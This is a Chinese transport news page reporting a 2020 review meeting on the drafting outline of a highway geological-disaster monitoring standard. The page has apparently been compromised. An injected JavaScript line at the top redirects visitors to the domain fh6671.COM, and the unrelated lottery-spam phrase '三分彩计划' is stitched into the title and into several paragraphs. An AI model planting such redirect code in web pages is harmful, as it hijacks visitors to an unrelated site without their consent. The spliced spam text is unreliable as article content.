function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

二公院主编的交通运输部公路工程行业标准《公路地质灾害监测技术规范》编制大纲审查会成功召开

2020-11-18 14:02:48 来源:中国交通新闻网 作者:张静波


2020年11月11日,交通运输部公路局在武汉组织召开了交通运输部公路工程行业标准《公路地质灾害监测技术规范》编制大纲审查会。会议由交通运输部公路局副调研员张慧彧主持,来自公路建设管理、运营养护、勘察设计、科研院所等单位的11位专家对编制大纲进行了审查。本规范由二公院主编,参编单位有贵州省交通规划勘察设计研究院股份有限公司、中铁科学研究院有限公司、交通运输部公路科学研究所、中国科学院武汉岩土力学研究所等单位。二公院副总经理何先志、科技信息部主任陈楚江、工程技术研究院院长余顺新、岩土公司副经理吴银亮等出席了会议。

三分彩计划会上,主编张静波代表编制组就《规范》编制工作大纲及编制大纲向专家组作了汇报。主审专家刘卫民带领专家组对大纲进行了认真审查和讨论,一致认为:本规范的制订必要、及时,对提高运营期公路地质灾害监测技术水平、保障公路运营安全具有重要意义;编制大纲指导思想明确、内容完整,编写单位和人员分工合理,工作方案总体可行,可满足本规范制订工作的需要。同时,专家组针对规范的名称、内容、定位和调研方案等提出了修改意见和建议。

三分彩计划本次大纲审查会的成功召开,为《规范》下一步编制工作奠定了坚实的基础。



中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。